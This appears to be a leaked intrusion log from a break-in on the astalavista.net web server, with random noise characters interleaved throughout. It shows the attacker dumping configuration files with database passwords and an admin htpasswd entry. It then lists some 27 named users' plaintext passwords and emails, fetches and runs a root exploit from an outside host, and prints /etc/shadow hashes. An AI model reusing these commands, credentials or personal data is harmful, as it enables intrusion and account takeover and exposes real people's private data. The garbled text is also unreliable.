drwxr-xr-x 3 astanet astanet 4096 Sep 7 2006 v2 3 ?3 v k2 w6 z+ f' xdrwxr-xr-x 16 astanet astanet 4096 Jul 5 2006 v2_old) W& p8 l( y1 F+ L6 i
-rw-r–r– 1 astanet astanet 35 Dec 4 2006 webcash.php4 R( }9 ?, k! D6 W6 a7 U" e# r7 z9 s' {
drwxr-xr-x 13 astanet astanet 4096 Sep 21 2006 wiki 3 l% Y8 l5 ]* @" H+ W" t' _3 v# A 2 a1 Z) G, v& T1 S# x8 o" @sh-3.2$ head -20 index.php% K# V% Q' r, p) ^& h) Y
<?PHP4 n/ |2 }& \% M8 c6 j( [7 E. b
/** 0 N$ E. f0 @( S3 a9 |* Mainfile (external) for astalavistaNET v2.0 , ^3 K% @5 K/ e6 V( C ]* 4 c1 P% X: x9 o7 a2 n7 t8 \* @copyright Astalavista IT Engineering GmbH ' }) r+ V5 s8 E" g$ q( `* @author Thomas Kaelin <链接标记thomas.kaelin@astalavista.ch>$ R$ j4 U/ v: T) A2 t" g
* @version 1.06 |& d5 ]1 P7 a) `# h1 Y
*/ 9 K5 M& ~% H8 u0 h/ E0 S. h# D + w8 U- c( X0 t# }% o if ($_SERVER['PHP_SELF'] == ‘/webcash.php’) { 6 n4 s" a0 c: P: ^ $dontStartSession = false; . e5 J( X0 R t+ U } else {5 ^# f) K2 @3 ?+ P3 V& V: m
$dontStartSession = true;* e+ ^$ F; t- k6 q( x
}5 v8 K Y" G) h+ V
require_once($_SERVER['DOCUMENT_ROOT'].’/config/com.conf.php’); 5 C1 ?, V4 B* u' B! V- G" t require_once($_SERVER['DOCUMENT_ROOT'].’/config/ext.conf.php’); r6 U0 h$ b5 M P$ m
require_once($_CONFIG['path_absolute'].$_CONFIG['path_init'].’com.class.php’); $ a& H# F _2 c: F3 S8 S require_once($_CONFIG['path_absolute'].$_CONFIG['path_init'].’ext.class.php’); & z# l9 _% U: R0 `( B6 A7 h: Q* j- E$ G2 f) t. u
sh-3.2$ cd config a' l- W5 C# F, Vsh-3.2$ ls -la 2 W8 C$ ]& I8 @+ Ztotal 32 4 h6 f6 m4 k4 j3 J( z8 ^4 Qdrwxr-xr-x 2 astanet astanet 4096 Aug 11 2006 . ; L* W; ?& e' D" r: K! c, _- q- Adrwxr-x— 29 astanet apache 4096 Jan 6 13:58 .. 7 W/ Y: n3 {3 l9 r( K-rw-r–r– 1 astanet astanet 987 Aug 11 2006 adm.conf.php 7 r+ Q& R/ o/ s: f5 s-rw-r–r– 1 astanet astanet 4937 Dec 23 15:48 com.conf.php0 a$ v9 V0 k9 Z
-rw-r–r– 1 astanet astanet 913 Aug 11 2006 cron.conf.php2 r2 w. N# U+ l0 o: b6 N
-rw-r–r– 1 astanet astanet 1668 Aug 20 2008 ext.conf.php6 j8 @0 `, |7 A
-rw-r–r– 1 astanet astanet 2724 May 30 2007 int.conf.php 0 s5 F, A9 o' Z3 a" m2 W3 @. N" t
sh-3.2$ cat com.conf.php 5 O0 Q6 g: J3 D0 l6 e[snip] * T8 i4 `0 f8 \1 w) k x//member-database1 R4 F- Z6 i: P K3 M
$_CONFIG['db_mem_server'] = ‘localhost’; " o2 {& @# ~7 _3 V' [" N" a, i% H4 i$_CONFIG['db_mem_database'] = ‘astanet_membersystem’; 0 e5 N5 g Z7 p5 D) U5 p$_CONFIG['db_mem_user'] = ‘astanet_db’;% B8 C3 `2 E' x6 [
$_CONFIG['db_mem_password'] = ‘TXwVrC7hbq’; # Y6 R" G: w' Y( }$_CONFIG['db_mem_debug'] = false; //true or false + @+ c& F+ d% g/ A* A# f; O) A//ads-database 2 K( F% l2 E5 V- ?! a8 Q2 i# g* h$_CONFIG['db_ads_server'] = ‘localhost’; 9 Y, u- J3 C% S7 N8 L$ e( b$_CONFIG['db_ads_database'] = ‘astanet_ads’;& {: m* e8 a; [" T
$_CONFIG['db_ads_user'] = ‘astanet_db’;: n' p% H4 G& l$ S
$_CONFIG['db_ads_password'] = ‘TXwVrC7hbq’;0 |0 }( D. Z* r) T) u
$_CONFIG['db_ads_debug'] = false; //true or false; b, ?2 i) z& x2 {" o* z8 n
//rainbow-database 6 x ~2 p! {% ^/ q+ e @$_CONFIG['db_rainbow_server'] = ‘212.254.194.163′; 0 [, F3 x& N+ _$_CONFIG['db_rainbow_database'] = ‘rainbow’;/ k) o1 s2 t% `- n/ r$ ?% Q4 q
$_CONFIG['db_rainbow_user'] = ‘dinu’;/ H5 f* [; w; M! v0 R, g
$_CONFIG['db_rainbow_password'] = ‘dinudinu’;" m5 k0 u: n7 r# y
$_CONFIG['db_rainbow_debug'] = false; //true or false: \0 E' Y" W ]/ [- @
//mailing lists database 3 P+ F( Q; H" l% W8 n$_CONFIG['db_mailing_lists_server'] = ‘localhost’;# e9 {1 W( E; ^3 B% b
$_CONFIG['db_mailing_lists_database'] = ‘astanet_mailing_lists’; + m0 L- [+ {/ K9 J# c2 R/ s, W9 N$_CONFIG['db_mailing_lists_user'] = ‘astanet_db’;& G& e- x& q7 O; O$ ?
$_CONFIG['db_mailing_lists_password'] = ‘TXwVrC7hbq’; * N. s& i8 {8 F2 e. h& w$_CONFIG['db_mailing_lists_debug'] = false; //true or false 2 ?% b" q x" a3 [1 V. p- {" ~) [//paypal % a! v: S, }0 `8 ]$_CONFIG['sub_pp_url'] = ‘链接标记[url]https://www.paypal.com/cgi-bin/webscr[/url]’;& i, }5 K, ^- X$ q) h6 ^8 ?6 R
$_CONFIG['sub_pp_cmd'] = ‘_xclick’; 1 h1 j V/ c" P+ L1 k+ w- V$_CONFIG['sub_pp_business'] = ‘链接标记info@astalavista.net’; * ?, ^/ d& m+ r" [* |% S# i$_CONFIG['sub_pp_noship'] = ‘1′; 7 J/ M% d. q& Y$ e7 k$_CONFIG['sub_pp_referer'] = ‘链接标记[url]https://www.paypal.com/[/url]’; 4 |/ `+ c2 O0 M- U) e[snip] @; K) ~, M' V8 s* F( O
& L9 E% L# @* `; {: y
sh-3.2$ cd .. ; R! g1 f2 N% ?$ P+ ^+ V& c wsh-3.2$ cd member1 x! X( O" j$ O# f8 f4 _) G2 q' B/ P
sh-3.2$ ls -la 1 o" h- U, \4 F! b* {( c- vtotal 20. e( ?" z6 q& C) I, u
drwxr-xr-x 2 astanet astanet 4096 Jan 13 14:02 . " I; x# M$ Q7 a) i( i2 Fdrwxr-x— 29 astanet apache 4096 Jan 6 13:58 .. 2 a/ A3 _6 D" c1 a$ p-rw-r–r– 1 astanet astanet 19 Jan 13 14:02 .htaccess) A6 A. T* ?7 z7 M2 ~
-rwxr-xr-x 1 astanet astanet 6709 Jan 13 14:06 index.php& b, ^7 `+ ~1 `8 ~/ c
sh-3.2$ cat .htaccess 5 K. J& o8 F5 z$ YSecFilterEngine off & D& N. ]. C7 ~& ~+ C" {" ]' Q, J
sh-3.2$ cd .. + W& s. ?$ h" esh-3.2$ cd cron & S- r, G( Z/ s" \( h) ksh-3.2$ ls -la" b$ C: i9 i( K: L+ J7 q( p, W
total 168 4 e& a2 `* x: ~ |; ^# Bdrwxr-xr-x 3 astanet astanet 4096 Jan 12 08:52 . # _& V4 j- n8 v" b+ Cdrwxr-x— 29 astanet apache 4096 Jan 6 13:58 ..) Z4 c* j: l8 \
-rw-r–r– 1 astanet astanet 1272 Jan 12 08:24 0_corefile.php, l6 @- H; n% D/ N& |, n; c
-rw-r–r– 1 astanet astanet 2356 Aug 11 2006 0_functions.php% w2 j$ k7 a5 x# V. q/ B
-rw-r–r– 1 astanet astanet 3616 Dec 23 15:44 1_daily.php 0 r: o( s" a7 p: s+ d-rw-r–r– 1 astanet astanet 527 Aug 11 2006 1_fivemin.php ) h' \* w& H& n9 \-rw-r–r– 1 astanet astanet 5006 Dec 23 15:39 1_hourly.php " x9 ^1 I9 P0 A) v-rw-r–r– 1 astanet astanet 432 Aug 11 2006 1_weekly.php0 J% F5 R* L4 D% |9 K6 b
-rw-r–r– 1 astanet astanet 2277 Aug 11 2006 2_advertising.php# w; h+ Y. `, D2 S* D; ]* r+ @0 a
-rw-r–r– 1 astanet astanet 4882 Dec 23 15:40 2_archives.php . E$ S, T/ |2 t$ l! F- m0 M-rw-r–r– 1 astanet astanet 3784 Aug 16 2006 2_awstats.sh 6 _1 e0 o! ^% y; A6 T-rw-r–r– 1 astanet astanet 14894 Jan 12 08:51 2_expire.bak.php0 o# `) O! k: W; k, J
-rw-r–r– 1 astanet astanet 14979 Jan 12 09:10 2_expire.php! b: W; [% q7 f3 r" d- s
-rw-r–r– 1 astanet astanet 7657 Aug 15 2006 2_exploitree_updater.php 0 A' y% G# `! @- S-rw-r–r– 1 astanet astanet 686 Dec 23 16:31 2_filesize.sh, H5 g: U U$ o- G
-rw-r–r– 1 astanet astanet 9853 Aug 11 2006 2_keywords_old.php . t% T1 `# Y- F% Z1 o! p5 w-rw-r–r– 1 astanet astanet 15664 Sep 22 2006 2_keywords.php2 r# l* L2 E. G% a2 j, T9 z" R
-rw-r–r– 1 astanet astanet 1233 Aug 11 2006 2_proxy_checker.php & i L) L. W+ U-rw-r–r– 1 astanet astanet 7558 Aug 11 2006 2_proxy_collector.php" p! F5 ?" p4 T2 B
-rw-r–r– 1 astanet astanet 796 Aug 11 2006 99_create_emails.php 7 B7 y- }1 J, `( t9 a; sdrwxr-xr-x 2 astanet astanet 4096 Aug 11 2006 99_lang_email$ f: B! h% Y' b! v) E
-rw-r–r– 1 astanet astanet 9622 Jan 6 16:04 login_reminder.php, U# r, O- N: z# Z7 i- N+ s5 _0 d
-rw-r–r– 1 astanet astanet 9620 Jan 6 16:05 login_reminder_test.php7 m$ w( U/ @, V* j6 x7 H
: T8 D! B. P* G3 x
sh-3.2$ cd .. + Y" Y7 B% D: Y% F5 y* bsh-3.2$ cd _007 4 u G; D4 J: Q/ Q& Y* T* Tsh-3.2$ ls -la0 W- M- j3 e1 w; g/ b. j. I
total 24 0 v& J2 {9 p4 X3 w/ Ldrwxr-xr-x 3 astanet astanet 4096 Dec 27 2006 .* \& H: ^, d9 L0 ^( Y' v% C( p
drwxr-x— 29 astanet apache 4096 Jan 6 13:58 .. + a$ b) {2 b8 Q( R6 @5 \-rw-r–r– 1 astanet astanet 96 Dec 23 15:17 .htaccess & ?( V+ F, `8 P, r-rw-r–r– 1 astanet astanet 3263 Jan 15 2007 index.php, o) O/ S' S& }! [) J! W( {
-rw-r–r– 1 astanet astanet 20 Dec 27 2006 info.php + ?# M, Y: J6 F: X7 f2 F' C& L# tdrwxr-xr-x 5 astanet astanet 4096 Aug 11 2006 sitemap " F g+ F+ }1 h ' v5 u! L" V- b3 Gsh-3.2$ cat .htaccess/ V7 v2 W. Z V% i. ?
authType Basic3 Q) x+ y) S: B' k9 T
authName Admin ! S' n, F5 _3 }% |authUserFile /home/astanet/auth/.htadm_pwd 8 A9 M. r2 i( b0 r' f1 n# trequire valid-user 8 I5 H% E& ?* }; d0 b+ y7 o/ R! M$ a
sh-3.2$ cat /home/astanet/auth/.htadm_pwd 1 A8 S' }4 y$ H) }0 m5 n( p- s# madmin2net:CR0bl65MwhfT 4 w2 k: b5 ^6 o) x" P& D( n6 O; m0 p
sh-3.2$ mysql -u astanet_db -p & x' Z& u- a, D. y6 IEnter password:' T* J% U2 C- _+ n
Welcome to the MySQL monitor. Commands end with ; or \g. & d! L( s, u" Z$ E, P8 G$ Y1 W& r/ {( bYour MySQL connection id is 275153 0 O, F% c' V2 m9 xServer version: 5.0.45-community-log MySQL Community Edition (GPL) g* F+ Q, W9 V8 j5 N6 b0 `; E J9 t. T( \1 F5 y- u
Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer. 9 o+ I- y0 v# X8 `" |, h2 i' d+ ~. S# |3 V# z; M' H9 s
mysql> show databases; 3 t3 l7 z5 O+ A3 G+ W8 j+———————–+ * ]' V, h5 d" C7 l- T/ O8 t F| Database |* y1 S3 R# m; J3 Y" t
+———————–+ / d* z9 h; W' a5 i+ D| information_schema | ! g1 O% W1 }" k3 d# g3 A3 c' O| astanet_ads |# j, B. ?/ {! |* `: L& O T+ }
| astanet_mailing_lists |$ b& D& g: G- t0 d& j! [0 t
| astanet_mediawiki | : S4 ^' Y7 L: f| astanet_membersystem | ! h# g( y5 W6 l8 n% o' R) v| test |: M9 n3 ~: I2 R0 b7 ], x5 U
+———————–+6 A5 A: m# e9 n4 l" ]
6 rows in set (0.00 sec)3 Q- ^* C3 E/ j. w0 P: }
" o/ V0 G7 F" _/ B8 ]) F
mysql> use astanet_membersystem9 c- W( z: S9 h. e& g
Database changed/ r. o2 p! R! K+ u, ^
mysql> show tables; % B$ t3 C5 p0 N* K! F. {5 q9 F' _+———————————–+ ' d' N' V. M" X, O7 r$ ^/ x0 x* R| Tables_in_astanet_membersystem | . X# Q- F$ |: P+ |+———————————–+ 0 H2 d1 S) l: S8 l| blacklist_categories | % k) ]9 j. D0 m/ Z& b| blacklist_content |6 ]; k) N% ?6 ?" c' o5 H" D1 b) G" f& n+ |
| blacklist_levels |6 W L5 F4 O7 n
| blacklist_mcset |2 ~8 V' d0 Z4 j* h3 G
| dir_categories |5 q, B# x8 o% ]4 Z' b
| dir_comments |6 ]2 n H2 {2 {8 R- @7 Q
| dir_links |6 E$ C C' i |# R5 d& C# I
| dir_temp |! j2 n, F& Y9 g: i
| dir_votes |- t4 L- j4 D/ v/ c) \2 c2 W
| documents | 7 e. l6 X5 |7 X* `- _! O" K| documents_categories | 6 e7 i h7 s4 ~" ~6 k9 l% X| email_content |5 ^& D) p0 {$ P, E3 A" A
| email_settings | 2 K) N6 l7 L: h8 _| exploits |) p0 E8 S5 N6 S& D
| exploits_categories | & J# c7 f* x3 F$ k- y$ s| exploittree_categories |1 e2 e: |% u$ t' r& C$ ^
| exploittree_exploits |9 D0 s2 p# w1 V
| home_values | 6 j2 t' x; c8 j& x! D9 a4 ~| iso_countries | + f. t/ w& F; ~7 T| links_categories |$ ~: S3 W/ P, z, Q: j- k- W
| links_records | % b: r# m5 q& W! }, d| links_unauth | 5 Z# g$ V. h0 j2 H| links_votes |8 f0 n" n5 A0 @
| log |& b2 o3 u& w' V5 f" j- [
| news_categories | , m4 o( ~) u! P/ O0 ]| news_comments |' I% ?4 \/ C/ g+ R% \
| news_emoticons | $ ^" L4 G" I1 ~1 u' v7 I$ C$ i# j| news_latest | 9 h p- n# i: J. o( d| news_messages | - u- d* A3 c. `4 }. r2 R8 Q" R9 Y$ r| news_statistics |7 {' n! X2 \) Z/ \
| news_votes |$ i: B' ~, y ]4 N& i2 h% m% a
| prices_content | 4 }6 f9 j! F4 o# `" k0 p5 h4 X| prices_offers | , B- R$ M Q8 J5 q0 l! I/ P8 _: x: q| rss_settings |( { j5 [% }* a3 @2 D. Z6 u
| sessions |$ U p4 a3 X1 h
| stats_signups |! m3 B& M* ?4 \& l8 T5 v6 d
| u2u2 | + ^7 S$ U6 R- m8 S| u2u_contact |: l/ O" g3 l/ q: ]/ H( _
| u2u_settings | - v+ p. @- P: V: F/ @| user_keywords_selected_categories | 6 K; O, k3 c7 \' q5 `+ c| users | 3 e% M" r" s4 z/ v| users_ipn_test | 0 w+ C! _4 s! A# q9 ?! w| users_keyword_values | ! B; N I0 P6 T* x4 [& m$ e| users_profile | 5 v1 l: a) f" w+ ^| users_temp | 1 p C8 I- w n. o, ~5 \! |7 ^| users_upgrade | % {$ o5 Y* X7 g" f! o. N* G+———————————–+ 8 G6 z/ b6 d* H5 z C, ?46 rows in set (0.00 sec)1 x5 F5 a$ a$ A/ `' ^* X! ]
( o) c4 L0 X/ ^2 N1 h6 ^9 R, {" r# wmysql> describe users; ( [1 k* t5 @! y8 y* B% c1 ^+————————–+————————————–+——+—–+———————+—————-+; q, Z f r8 q8 H4 K9 G8 H+ _
| Field | Type | Null | Key | Default | Extra |7 x) X# Z2 p9 ]% b# P
+————————–+————————————–+——+—–+———————+—————-+* x- D" ~$ O0 L" b2 t. a+ o5 K
| primary_key | smallint(5) unsigned | NO | PRI | NULL | auto_increment |0 v( O! [" u e/ q& C: }4 Z. ?
| user | varchar(50) | NO | | | | p& r7 z" Q8 k! ~! e# a2 K- c& x% h& u
| nickname | varchar(30) | NO | MUL | anonymous | |3 r+ L' s: u$ r
| password | varchar(30) | NO | | | |$ V$ N; ~0 B9 @( r3 |
| userlevel | tinyint(3) | YES | MUL | NULL | | , i0 ?2 y0 ]0 }$ K| exp | int(8) unsigned | NO | | 0 | |2 S* V' q! V5 o; _' [% A! }9 L
| email | varchar(50) | NO | | | |4 J5 p1 D3 \+ `' v/ @# C3 x8 P% }
| ip | varchar(15) | NO | | 0 | | % q$ W* P6 U+ I0 {: I| proxy | set(’0′,’1′) | NO | | 0 | |0 ~0 ^4 h1 o7 W4 f, v; M6 v$ C& B
| logtime | timestamp | NO | | CURRENT_TIMESTAMP | | $ j+ a) u6 \5 j/ B5 |3 ^% }& a| login_reminder_last_sent | timestamp | NO | | 0000-00-00 00:00:00 | |& s) V; {7 {9 \ h6 I, Q
| anz_in | tinyint(1) | NO | | -1 | | G" o3 l/ w- o8 `" h
| status | tinyint(1) unsigned | NO | | 0 | | 4 F- u Z( ?0 l4 X& j( T$ Y" u| checked | set(’0′,’1′,’2′) | NO | | 0 | | % H. ]1 l2 D+ w( \) A8 K| freemember | set(’0′,’1′) | NO | | 0 | |/ o* }2 n- {6 R- {% s' e% U8 S3 b
| ordertype | set(’transfer’,'wp’,'pp’,'mc’,'CnB’) | YES | | NULL | | * V. Z/ g$ _% ^1 y T| lang | tinytext | NO | | | |8 r/ ^4 T& g6 E8 P' [% Y' u
| adid | smallint(6) | NO | | 0 | | J- W7 h2 k; k; x7 I# t| pp_txn_id | varchar(255) | YES | | NULL | |' X8 X: K2 k% P* A6 H; @9 N
| cnb_transaction_id | varchar(255) | YES | | NULL | |8 O8 g% Q( {! U! c* x
| cnb_order_id | varchar(255) | YES | | NULL | | + S" ?4 R# T& I. z+ B5 v) c| cnb_user_id | int(11) | YES | | 0 | | : s8 p% q3 R: a+————————–+————————————–+——+—–+———————+—————-+ 9 @' n' d+ q+ A, l3 Y+ q22 rows in set (0.01 sec)$ F& c" C- R/ S1 h) {: ]6 }+ f; e
& \5 j- s* D0 I$ Y# Q2 O+ omysql> select count(*) as skids from users;# e. y3 [8 V' `* ]
+——-+( X5 N) [( J1 c9 @5 U' Y
| skids | 5 H3 D3 @9 a8 O, L8 j+——-+- |* K) V# A b7 t8 ?) b2 a& h+ F
| 25199 | " l' i; h! q8 _+——-+6 v+ B' B& q5 N: t) R
1 row in set (0.00 sec) * k @0 l- ?! N/ r; z- x) G, C' X3 a: Z+ U8 k1 a2 _
mysql> select user,nickname,password,email from users where userlevel = 1;9 ~5 y% |# r" p( k. } s
+————————–+———————-+——————+———————————–+ + `, p( ~5 E/ j! H| user | nickname | password | email | . {! z+ I( r( h# v o2 H- n% Q! _+————————–+———————-+——————+———————————–+! W- b! T9 f Y2 j. C$ p
| pascal | prozac | astaman3 | 链接标记info@astalavista.net |* b$ q; l$ ]0 v. p3 S- ^9 ~4 P
| Ivan Schmid | rOOtless1 | astalavista4asta | 链接标记ivan.schmid@comvation.com | # ^. X+ x" U( ^, O| qreymer | Palermo | qblsw85iam | 链接标记eche@home.se |1 \& _7 Y7 L+ \0 H" L3 w
| Christian Wehrli | g0atherd | hitt?74 | 链接标记g0atherd@gmx.net | 3 s& ~7 |2 s/ _6 Q| Andrew Blake | Minky | liq73uid | 链接标记a.blake@har.mrc.ac.uk | " c/ v0 q) \ C| Martin Wyss | dinu | kj63;cXy | 链接标记martin.wyss@astalavista.net | . T- V/ [2 R' |0 E* k: U| Leandro Nery | Timan_no_Sanco | nery2002 | 链接标记leandronery@hotmail.com | / Q3 J: g3 F: `7 A6 Z| shaving ryans privates | ShavingRyansPrivates | memberboard313 | 链接标记shavingryansprivates1@hotmail.com |. ^% \/ ?! Y: O' I" S5 ^- o
| Gerben van der Lubbe | Spoofed Existence | Lb59eXg5 | 链接标记spoofedexistence@hotmail.com |3 n: ]* E2 E+ B, |
| David M Lee | Daremo | icG12m03 | 链接标记daremo@hackerheaven.com | ( M& K2 `- H1 F6 n$ a; C| David Corn | akriel | ve3uB$cUku | 链接标记akriel@fallenroot.net |' A; L9 x8 Z: M1 i& l5 t. [
| Thomas Kalin | Gwanun | QwErTy123 | 链接标记thomas.kaelin@astalavista.net | & Z" e6 `# M7 d( m( I/ n| Marcus unknown | Cra58cker | hhCr4ck06 | 链接标记unknownmarcus@hotmail.com |* v# v) z! h3 ?! y
| David Ellis | dellis203 | philip | 链接标记dellis@nightwatchnss.com | % Y/ w9 V* \# N| Lars Christian Solberg | xeor | tF3s4|Nea | 链接标记xeor@hush.com | & i& U# N1 k8 s. l a3 k, R3 {| Paulo Santos | Be1er0ph0r1 | amor01 | 链接标记pmsantos@gmx.ch |6 r& \( h4 F- b. c2 e! w" b
| Thomas D?ppen | daha | asta4tom | 链接标记thomas.daeppen@astalavista.ch |! `3 l1 U9 J) f6 V& c& M7 A/ ?
| Touraj Abbasi Moghaddasi | -Crow1 | NetR0ck | 链接标记toraj.a.m@gmail.com | " }* @/ k# Q% s# o$ k) Q" n& m| Fabius Bernet | traviser | wellenreiter100 | 链接标记fabius.bernet@astalavista.ch | + e* u" p" o8 i+ P| Zachary McElroy | duder1 | dirty245dix | 链接标记mcelroyzj@yahoo.com | ! M1 y. f5 x. P/ a; J0 A T8 P| Leron Cohen | cohen2 | leron4free | 链接标记leron@quiredmedia.com | 5 {+ b p% B, d, z8 Q2 y' s' M| Beatriz Pontes | anonymous1656 | pitas | 链接标记joao.pedro.pontes@gmail.com | 2 H% w; {& q9 Z| Glafkos Charalambous | anonymous2086 | si99490178$# | 链接标记nowayout@webhostline.com | ; `3 D' |% Q. ~9 H# m0 g* m| developer COMVATION | anonymous2402 | Ri?Q$Q$MVU | 链接标记ivan.schmid@astalavista.ch |% |2 Z& V, y; i% H
| Peter Fisher | cyph3r1 | testZer025435 | 链接标记cyph3r@astalavista.com | ) R5 S+ I' ~2 p| sykadul | sykadul | ak29eral | 链接标记sykadul@gmail.com | 6 h7 C# m1 t& B* Y, _| Ronny Janzi | commander1 | mpbdaagf6m | 链接标记ronny.janzi@astalavista.ch | 7 N9 E+ Q. K. v2 n; x0 O) \+————————–+———————-+——————+———————————–+ # ^% q! ]% B, O$ M5 E27 rows in set (0.00 sec) ! p7 I) Z$ D# e R. o3 G L. B; Z( ?% S; W% E. B
mysql> exit; 3 H& \8 q% n( O% i6 V/ tBye * q) ]) N5 J; x" F' W6 f5 V0 ?. }
[~] plaintext passwords? yes,# R9 r* Z) L# s, }$ h
Those so called “security professionals” who charge you $6.66 / month to/ T! T9 b5 S( H# @$ U$ B C
register at their hack-proof portal, save your passwords in plaintext… 3 H# r: X1 I3 |2 x! }7 }% Kbrilliant!, `7 q" T3 Y% I+ r
; K# o! b/ L+ p$ C- ^3 {. x' q
[~] This been fun but we want more.: S, }/ T; {8 j
- O6 F Z6 `5 `! H( A7 t7 c7 |
sh-3.2$ uname -a) |$ @' S# ]+ T% [! |- @
Linux asta1.astalavistaserver.com 2.6.18-128.1.10.el5 #1 SMP Thu May 7 10:35:59 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux + M" A) i! l, ^. w p Ksh-3.2$ wget 链接标记[url]http://anti.sec.labs/g0troot[/url]' B5 N- i) p8 k6 P$ C6 Q
–13:33:37– 链接标记[url]http://anti.sec.labs/g0troot[/url] * b% C" C Q# L% F* V1 EResolving anti.sec.labs… 13.33.33.37" S" z/ J$ G1 Q
Connecting to anti.sec.labs|13.33.33.37|:80… connected. 7 x+ H3 u% r8 FHTTP request sent, awaiting response… 200 OK ) _8 `. f" A/ W, k3 Z* Q4 }( E, GLength: 18200 (18K) [text/plain]7 i# |1 t" D$ C' u0 G. L
Saving to: `g0troot’* J, ^& ^; m% g& Y8 P, `9 F4 d
; A7 d- W7 e. j; z" Y) D3 Q: _/ `
100%[=========================================================================================================================================>] 18,200 58.6K/s in* k N+ z6 p+ F
0.3s5 @7 n/ a4 F3 n [0 I$ q1 k0 l' P
- Q7 W& p8 m3 [: @% K+ x
18:55:14 (58.6 KB/s) - `g0troot’ saved [18200/18200] " Y* E/ N. i6 k. j' N2 h! m* N" q 7 q, T0 e5 D3 o" J, |5 e9 q" \sh-3.2$ ./g0troot -i x86_645 k; p4 s6 @, S n% x
[+] g0troot - anti.sec.labs % ~7 ~" n* x0 r1 C[+] Target: 2.6.18-128.1.10.el50 Z% l" x: g* C# U3 i0 K- R& o2 h
[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~>]& \" u( |8 h+ A: X: t& K
8 _. n3 e2 A+ p7 F8 Y
[+] r00tr00t % ]) v( F. D, k7 Y& U$ l[~] Executing shell…& a# e# K/ g6 [ _
' ]1 V% C d7 i' E3 ]: y, b' U. D
sh-3.2# id # i1 n& B9 ^- e, Y" d" e muid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel) $ ]5 F' |! T3 ^# b+ c& v# f: \" s2 E- f. O# [: n
sh-3.2# cat /etc/shadow & b8 L/ U8 I/ u% Froot1$P/3ZMAgv$E9B4mX02s1Xrimj46V602.:14015:0:99999:7::: ( n/ i$ l+ ^. n' ]$ |7 r[snip] d; i+ S) s8 A4 O7 h: Fadmin1$sbycsEGo$d81laShnxFiziFaQMH32F.:13770:0:99999:7::: ) `- Q4 F! T- p- `) S1 I2 u' E: tjon1$5yHxRLX.$8pZs0cQLNh5uFCK3m4st1.:13777:0:99999:7::: # a; K% V* k% d" vcom1$jEZ62nri$aDTj.1REsrYePcPBdfOQz1:13780:0:99999:7:::- v; p y( V6 @6 `, t
astanet1$YniJLAr.$NKtPNNGK9mcmz3/mLMSWC1:14235:0:99999:7::: . e+ H4 i( I Q' c' r2 ~- Q" k+ i8 q# y- m3 O+ L
sh-3.2# cat /etc/motd 7 g) M0 t. q [5 v, p##################################################### 5 K2 D2 t( v% R; k#____ ____ ___ ____ _ ____ _ _ _ ____ ___ ____ # + l7 \& `& [ w S m# |__| [__ | |__| | |__| | | | [__ | |__| #) t* H; W1 E7 W& s# B- c$ b
# | | ___] | | | |___ | | \/ | ___] | | | # 5 {0 G$ ?3 w: L9 U# V# # 9 G7 k3 B- i( x5 Z##################################################### 7 A# e- e7 F: P+ h3 ?# # " W# y& U5 Y7 w2 ?# Admin Contact - 链接标记support@secureservertech.com # ; l" z0 [& J; Q) `* [0 ?# #+ J& j* @/ E# {7 z
# Available ShortCuts #; q4 g9 x. A; e2 K9 V1 R# d2 f
# #2 E, ~+ S6 z: R& A; M* L
# nst - list active connections #& D- g( M2 G+ ~6 a: g# G9 `+ z
# ddos - shows how many times each ip is connected # / n9 R0 q) g! \% c B# ltr - restart the webserver # * L2 N& Q8 i- r1 n) t0 j# phpc - edit the php config file #& N! u# s8 Y3 i% | m% J
# htc - edit the webserver configuration file # 7 y# k5 V4 a4 `& Z# up - uptime #" N4 T5 [; k# M, D. O( N: r
# etd - edit the motd of the day file #8 w8 d( D% J1 G/ _8 m, h
# htr - start and restart apache if needed #& ]: N; T7 }/ h9 t
# syng - shows active SYN_RECV connections # 4 h4 X* Q9 }: V) R9 ?/ P! c: _3 z6 ]# synd - syn flood blocker - “synd -h” for usage # ]- s/ A% }0 g+ e8 r. R; E
##################################################### , ^3 r Z, o+ v2 S6 m# NOTES: #+ Z+ A$ E1 a' M- y) l. Y
# Last Upgrade - 12-08-2008 by JF # . i! \0 K( D u- R- S0 b7 I% i. ~# My.cnf/Mysql Optimization - 1-28-09 #; @# x0 g- O4 G$ w
# #4 N( }; m! J' N( F7 h( s( P0 c V
# # # \/ z8 K- _: l; l/ [5 ?# #1 T; N, A8 v @0 T- G
##################################################### 0 X3 a6 Z3 ]2 K i6 g* @' {; g! r1 }. }2 R: E5 l0 j
sh-3.2# lastlog | grep -v Never - e3 b# [4 q* F5 u9 b! H6 @5 oUsername Port From Latest3 T# c5 j7 [3 Q: x! p
root pts/1 adsl-194-162-fix Thu Jun 4 07:19:14 +0000 2009. Z# t. w' b" G
admin pts/1 cp.secureservert Thu Mar 20 10:25:39 +0000 2008 & l) R. y$ u6 n" Pcom pts/0 cust.static.212- Tue Jun 2 07:46:30 +0000 2009 % h1 D% H& F6 Iastanet pts/0 adsl-194-162-fix Thu Apr 16 08:20:44 +0000 2009' h) K: |7 H" ~5 j! I
- F j$ U0 }( K- W$ X9 \: ush-3.2# ls -la / L1 m: }2 O8 Y# `) M( \total 453376/ f( u3 [0 f# q5 A
drwxr-x— 15 root root 4096 Jun 4 08:40 . 9 y1 _! j% h& o- ?, B; j5 s) odrwxr-xr-x 25 root root 4096 Jun 3 02:43 .. ; _) c5 G+ }6 _# l) t: a, E-rw-r–r– 1 root root 2394400 Oct 19 2007 10mbtest.zip 8 x* j8 `# t1 P7 `; `-rw——- 1 root root 1006 Sep 11 2007 anaconda-ks.cfg . _& ?& E F0 ?0 O) Q-rw——- 1 root root 16836 Jun 4 07:21 .bash_history2 p/ y4 S. S# a) G3 z; a
-rw-r–r– 1 root root 24 Jan 6 2007 .bash_logout9 V( [* D3 `8 n, t& \4 b( V
-rw-r–r– 1 root root 191 Jan 6 2007 .bash_profile 5 E C" F! w+ ?-rw-r–r– 1 root root 176 Jan 6 2007 .bashrc & I5 x! M1 e( K# O9 u1 |; u-rwx—— 1 root root 1899 Oct 28 2007 bk.sh% ?/ K; ]! k) L ]0 v
-rw-r–r– 1 root root 1327 Nov 29 2007 cert, |; p. g J3 T# G) C. \& E
-rw-r–r– 1 root root 139860821 May 14 2008 contrexxbackup_20080514.sql+ k! O" s4 i- m V5 c: B- c7 r$ C
